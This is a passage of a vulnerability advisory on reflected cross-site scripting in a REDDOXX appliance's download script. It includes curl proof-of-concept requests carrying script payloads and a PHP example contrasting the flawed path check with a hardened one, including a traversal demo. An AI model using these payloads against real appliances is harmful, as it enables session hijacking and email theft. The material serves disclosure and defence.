    // Currently we only allow downloads from session directories
    if ((strpos($file, '/opt/reddoxx/wi/Sessions/') === false) &&
        (strpos($file, '/opt/reddoxx/data/temp/Sessions/') === false)) {
        die('File is not in session directory: ' . $file);
    }

    if(!file_exists($file)) {
        // File doesn't exist, output error
        die('File not found: ' . $file);
    } else {
        [...]
    }
    ?>

The script expects a URL parameter called "file" and stores its value in the variable $fileName. The value of this variable is then copied to the variable $file, which undergoes two different checks: First, the function strpos() is used to check whether a certain substring is contained in the value of the variable. The second check uses the function file_exists() to determine whether the file specified in the variable is present in the filesystem. If either of these checks fails, the value of the variable $file, which is controlled by the attacker via the URL parameter, is embedded unencoded into an error message which is returned to the user with a content type of "text/html".

Proof of Concept
================

The following curl command-lines can be used to trigger the vulnerability at both locations of the PHP script:

    $ curl --include 'http://www.example.com/download.php?file='\
    '<script>alert("RedTeam%20Pentesting")</script>'
    HTTP/1.1 200 OK
    [...]
    Content-Length: 78
    Content-Type: text/html

    File is not in session directory: <script>alert("RedTeam Pentesting")</script>

    $ curl --include 'http://www.example.com/download.php?file='\
    '/opt/reddoxx/data/temp/Sessions/<script>alert("RedTeam%20Pentesting")</script>'
    HTTP/1.1 200 OK
    [...]
    Content-Length: 92
    Content-Type: text/html

    File not found: /opt/reddoxx/data/temp/Sessions/<script>alert("RedTeam Pentesting")</script>

In both cases, the response containing the error message is returned with the Content-Type header set to "text/html", causing the browser to execute the injected JavaScript code.
The same functionality is vulnerable to an arbitrary file disclosure attack as described in rt-sa-2017-004 [2] and indicated by the second curl command.

Workaround
==========

None

Fix
===

Update the appliance software to Version 2032 SP2.

Security Risk
=============

The vulnerability allows attackers to extract users' emails from the REDDOXX appliance. However, as a session ID stored in the DOM of the website is used for authentication rather than cookies, the attacked user must first log in. Once attackers have access to the user's session ID, the victim's browser can be instrumented to retrieve emails stored in the system and send them to a system under the attacker's control. The vulnerability is therefore rated as a high risk.

Timeline
========

2017-05-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
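As an added example covering both advisories above (not code from the REDDOXX appliance or from RedTeam Pentesting): the substring-based directory check of download.php placed beside a canonicalising check that rejects the traversal path, and an encoding helper for the reflected error messages. The function names, the $allowedDirs parameter and the temporary directory layout used for the demo are this example's own assumptions.

```php
<?php
// Added example, not REDDOXX or advisory code: the substring directory check of
// download.php beside a hardened variant and an encoding error helper. Function
// names, the $allowedDirs parameter and the temporary demo tree are assumptions.
// As in the advisory: strpos() only asks whether an allowed directory occurs
// somewhere in the string, so ".../Sessions/../../etc/passwd" passes, and
// file_exists() then merely confirms that the traversed target exists.
function vulnerable_in_session_dir(string $file, array $allowedDirs): bool
{
    foreach ($allowedDirs as $dir) {
        if (strpos($file, $dir . '/') !== false) {
            return file_exists($file);
        }
    }
    return false;
}

// Hardened: canonicalise first (realpath() resolves "..", "." and symlinks and
// fails for missing files), then require the canonical path to begin with the
// canonical allowed directory plus a separator. Returns a path safe to readfile().
function resolve_session_file(string $file, array $allowedDirs): ?string
{
    $real = realpath($file);
    if ($real === false || !is_file($real)) {
        return null;
    }
    foreach ($allowedDirs as $dir) {
        $base = realpath($dir);
        if ($base !== false && strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0) {
            return $real;
        }
    }
    return null;
}

// Both error paths reflect $file: encode it rather than concatenating raw input
// into a response the browser treats as text/html.
function safe_error(string $message, string $file): string
{
    return $message . ': ' . htmlspecialchars($file, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$root = sys_get_temp_dir() . '/reddoxx-demo-' . getmypid(); // stands in for the Sessions dir and its parent
mkdir("$root/Sessions", 0700, true);
file_put_contents("$root/passwd", 'root:x:0:0:root:/root:/bin/bash'); // constructed sample target
$allowed   = ["$root/Sessions"];
$traversal = "$root/Sessions/../passwd";
var_dump(vulnerable_in_session_dir($traversal, $allowed)); // bool(true): check bypassed
var_dump(resolve_session_file($traversal, $allowed));      // NULL: traversal rejected
echo safe_error('File is not in session directory', '<script>alert(1)</script>'), "\n";
```

The hardened check also rejects symlinks pointing out of the session directory, which a pure string-prefix check on the unresolved path would not.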